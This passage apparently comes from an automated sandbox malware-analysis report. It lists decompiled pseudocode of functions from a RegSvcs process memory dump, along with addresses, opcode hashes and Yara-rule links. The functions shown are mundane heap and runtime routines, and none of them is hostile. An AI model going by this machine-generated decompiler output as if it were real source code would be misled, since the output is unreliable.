				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E010888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00FDC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xf91030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x00fb4f2e
0x00fb4f34
0x00fb4f38
0x01010b85
0x01010b85
0x01010b89
0x01010b9a
0x01010b9a
0x01010b9f
0x00000000
0x01010b9f
0x01010b94
0x01010b98
0x00000000
0x00000000
0x00000000
0x01010b98
0x00fb4f3e
0x00fb4f48
0x00000000
0x00fb4f6e
0x00000000
0x00fb4f70

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bda83a823629128ab13617b964f91b3af13fe35c37234353c7265468773b24
Instruction ID: 6d4e35e8847622d3d227a6f4b3c305f8e4717a4e020b38cee870edb77e7a9d47
Opcode Fuzzy Hash: 58bda83a823629128ab13617b964f91b3af13fe35c37234353c7265468773b24
Instruction Fuzzy Hash: 87F0BE725256858FE7A2DB1CC180B22B7D8BB00778F4484A6E5C587A2EC768E8C0C680

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x10a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00FFFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x00fea44b
0x00fea453
0x00fea472
0x00fea476
0x00000000
0x00fea493
0x00fea47a
0x00fea47f
0x00fea486
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e95a449e243fbb21f8329edb0614cc426deae7a99a243da46c33cd172454dc
Instruction ID: 4a0bfa1e2a321f39db8a222854ef2b082ed07d400f1a8494d8a44fcf415d9275
Opcode Fuzzy Hash: 44e95a449e243fbb21f8329edb0614cc426deae7a99a243da46c33cd172454dc
Instruction Fuzzy Hash: C2E02273A01421ABC2228B08AC00F66B39DDFD0B10F0A4035F604C7260C66CED01D3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00FBF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00FEF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00FD4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x00fbf35d
0x00fbf361
0x00fbf367
0x00fbf372
0x00fbf38c
0x00fbf38c
0x00fbf394

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 1b0146d0bf7876dbe3a546a8839fc0c178b5669b270527c105812d9599f34b90
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: FBE0D832A40118BBCB2196DA9D06F9ABBADDB44B60F040165B904D7150D5759D00E7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4710 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE4710(intOrPtr* _a4) {
				void* _t5;
				intOrPtr _t12;
				intOrPtr* _t14;

				_t5 = E00FD7D50();
				if(_t5 != 0) {
					_t12 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x10));
					L3:
					 *_a4 = _t12;
					L4:
					return 1;
				}
				if( *0x7ffe0268 == _t5) {
					_t14 = _a4;
					if(E010664FB(_t14) >= 0) {
						goto L4;
					}
					 *_t14 = 1;
					return 0;
				}
				_t12 =  *0x7ffe0264;
				goto L3;
			}

0x00fe4716
0x00fe471d
0x01026655
0x00fe4735
0x00fe4738
0x00fe473a
0x00000000
0x00fe473a
0x00fe4729
0x0102662d
0x01026639
0x00000000
0x00000000
0x01026641
0x00000000
0x01026641
0x00fe472f
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction ID: 9fc9a1db096ee04809ac685cabfd97824bc55c7f8d82258a6b673ebcc1ecbfb9
Opcode Fuzzy Hash: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction Fuzzy Hash: 83F09B76204350DFDB16DF16D040AA57BE6EB56350F140099FD818B351DB36F941DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FCFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xf911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E010888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00FD0050(_t14);
				}
			}

0x00fcff66
0x00fcff6b
0x00000000
0x00fcff8f
0x00000000
0x00fcff8f

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29666b8def8f3bfe4d061259374e4ac8621cf1af699517fccb2796972dec7012
Instruction ID: eb8b2eeb331316b4f2c92911428178200cebb95a4f54fb31fa3ac13888f3e0a1
Opcode Fuzzy Hash: 29666b8def8f3bfe4d061259374e4ac8621cf1af699517fccb2796972dec7012
Instruction Fuzzy Hash: DFE0D8B1905206DFD735D751D245F15B79EDB51731F19823EE00847105C621DD84E205

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3F33 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE3F33(void* __ecx, signed char _a4) {
				signed int _t12;

				if(( *(__ecx + 0x40) & 0x75010f63) != 2 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					return 0;
				} else {
					if((_a4 & 0x00000001) != 0) {
						_t12 = 1;
					} else {
						_t12 =  *0x10a6240; // 0x4
					}
					return 0x7d0 + _t12 * 0x3480;
				}
			}

0x00fe3f43
0x00000000
0x00fe3f54
0x00fe3f58
0x00fe3f70
0x00fe3f5a
0x00fe3f5a
0x00fe3f5a
0x00000000
0x00fe3f65

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92e379c7881aed58308b4c48794364ab865f1e3623721802d9550b57638a651
Instruction ID: 6a2ed7a33142e7c3962e5b8cf9e5d6e7925fb5419baa5331f66b7deb7281c7ec
Opcode Fuzzy Hash: e92e379c7881aed58308b4c48794364ab865f1e3623721802d9550b57638a651
Instruction Fuzzy Hash: 97E02633D242C4ABC7259616C58E72237FCFB60768F244425E406CF481DA69FB51E6C8

Uniqueness

Uniqueness Score: -1.00%

Function 010441E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x10908f0);
				_t5 = E0100D08C(__ebx, __edi, __esi);
				if( *0x10a87ec == 0) {
					E00FCEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x10a87ec == 0) {
						 *0x10a87f0 = 0x10a87ec;
						 *0x10a87ec = 0x10a87ec;
						 *0x10a87e8 = 0x10a87e4;
						 *0x10a87e4 = 0x10a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01044248();
				}
				return E0100D0D1(_t5);
			}

0x010441e8
0x010441ea
0x010441ef
0x010441fb
0x01044206
0x0104420b
0x01044216
0x0104421d
0x01044222
0x0104422c
0x01044231
0x01044231
0x01044236
0x0104423d
0x0104423d
0x01044247

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d8d73884e969c8295dd63b845414c5674dfa4d2b4bce8637c4646885cb16eb
Instruction ID: bb1675036cd2da2d3f23a3e6eb567f1c38e1c83a4b529fbe78a6b2dcaa2ae380
Opcode Fuzzy Hash: a5d8d73884e969c8295dd63b845414c5674dfa4d2b4bce8637c4646885cb16eb
Instruction Fuzzy Hash: 7BF015B4920B01CFDBB1EFE9D60075C3AA4F744312F8081ABA1C487288C73985A0DF11

Uniqueness

Uniqueness Score: -1.00%

Function 0106D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0106D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00FBE8B0(__ecx, _a4, 0xfff);
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0106d38a
0x0106d39b
0x0106d3b1
0x00000000
0x0106d3b6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 40b78c00a4668447c76142caa6e2f77f4d83662b491bb862e5838017bd023ddc
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 79E0C231384654BBDB226E84CC01FA9BB5ADB507A0F108032FE885E791C675DC91EBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x10a67e4 >= 0xa) {
					if(_t5 < 0x10a6800 || _t5 >= 0x10a6900) {
						return L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00FD0010(0x10a67e0, _t5);
				}
			}

0x00fea190
0x00fea1a6
0x00fea1c2
0x00000000
0x00000000
0x00000000
0x00fea192
0x00fea192
0x00fea19f
0x00fea19f

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c529774eeffbc8e1861e1a64cefbac5a87415192ce22734ad4a32f4fa0281c61
Instruction ID: 6bd33cac5dba5283b4a85a3fe8e36315da29beadd579f675cda54aa1bc316345
Opcode Fuzzy Hash: c529774eeffbc8e1861e1a64cefbac5a87415192ce22734ad4a32f4fa0281c61
Instruction Fuzzy Hash: 59D02B711300805ACB2C2741CC14B293237F780700F79484EF1434A6A0FD5E98D4B50A

Uniqueness

Uniqueness Score: -1.00%

Function 00FE16E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00FE1710(0x10a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00FD4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x00fe16e8
0x00fe16ef
0x00fe16f3
0x00fe16fe
0x00000000
0x00fe1700
0x00fe170d
0x00fe170d
0x00fe16f2
0x00fe16f2
0x00fe16f2
0x00fe16f2

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ce88424a9b97de748fdecbfc3fa3ea9fd18f624930275a6f03f6810d8318e1
Instruction ID: 7ca75355ce707847b0838115cc4d670e6d85fc059f87bcf6ea30036df7ccc91e
Opcode Fuzzy Hash: 13ce88424a9b97de748fdecbfc3fa3ea9fd18f624930275a6f03f6810d8318e1
Instruction Fuzzy Hash: AED0A73120018052DA2D5F139C45B183262FB84B91F3C006DF107494D1CFB5DC92F048

Uniqueness

Uniqueness Score: -1.00%

Function 010353CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00FCEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x010353ca
0x010353ce
0x010353d9
0x010353de
0x010353e1
0x010353e1
0x010353e6
0x010353f3
0x00000000
0x010353f8
0x010353fb

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 1a5fa42b510e4abafcd3e24aa84494af0d94f9288f5256ef945c691f3b0102b6
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: FFE08C329047809BCF12EB48CA51F5EBBF9FB84B00F180448B0085F631C638AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00FCAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x00fcaab6
0x00fcaabb
0x0101a442
0x00000000
0x0101a448
0x0101a454
0x0101a454
0x00fcaac1
0x00fcaac1
0x00fcaac6
0x00fcaac6

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 2ce28c42c131dd8abe33518a5b045fe5dc28873fa04ce19167948fa5fe51dd66
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 06D0C935352980CFD617CB0CC554B0533A4BB44B44FC504D0E440CB722E62CED40CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00FE35A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00FCEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x00fe35a1
0x00fe35a1
0x00fe35a5
0x00fe35ab
0x00fe35ab
0x00fe35b5
0x00000000
0x00fe35c1
0x00fe35b7

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 24b5d51bcf3ea01b2e8b86bd12858a7bee697a93e8d4b119b06a306659642d7e
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: EAD0C9329513C69ADB51AF51C61CB7877B2BB00328F6C2069944647A62C33A4F5AF602

Uniqueness

Uniqueness Score: -1.00%

Function 00FBDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00FD4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x00fbdb4d
0x00fbdb54
0x00fbdb5f
0x00fbdb56
0x00fbdb56
0x00fbdb5c
0x00fbdb5c

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: def101fc2dac14082393299449f9784cdb9e20fab67e01acd92673c332941c34
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 74C08C30280A00ABEB221F20CD02B4076A1BB41B05F4900A07301DA0F1EB7CEC01FA00

Uniqueness

Uniqueness Score: -1.00%

Function 0103A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103A537(intOrPtr _a4, intOrPtr _a8) {

				return L00FD8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0103a553

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 7995cce42b2256152ebe4142147d8d2b7cb05cf2c6c6b2ad2fa4952af0ab2432
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D0C01233080248BBCB126E81CC01F067F2AEB94BA0F048011BA080A6618A36E971EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00FD3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD3A1C(intOrPtr _a4) {
				void* _t5;

				return L00FD4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00fd3a35

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 027a8c62344fa1421c0687a9a3adb3e140124a618f90cfcc952e26399549befc
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: F4C08C32080248BBC7126E41DC01F01BB2AE790B60F040021B6040A6618536EC60E588

Uniqueness

Uniqueness Score: -1.00%

Function 00FBAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBAD30(intOrPtr _a4) {

				return L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00fbad49

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: a12822607f047a8df4b2ed63ae9d03f57ca7a7968ee1b189fcd51d470b01372a
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: ACC08C32080288BBC7126A45CD01F01BB2AE790B60F040021B6040A6628936E860E588

Uniqueness

Uniqueness Score: -1.00%

Function 00FC76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x00fc76e4
0x00000000
0x00fc76f8
0x00fc76fd

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 88217f467d17a55cbd8204712653fb616fe95128d5893c3ac1b0352991dc4495
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 48C08C70549BC95AEB2A7708CF23F203650AB08718F88029CBA010D5A2C36CAC02FA08

Uniqueness

Uniqueness Score: -1.00%

Function 00FE36CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x00fe36d2
0x00fe36e8
0x00fe36d4
0x00fe36e5
0x00fe36e5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
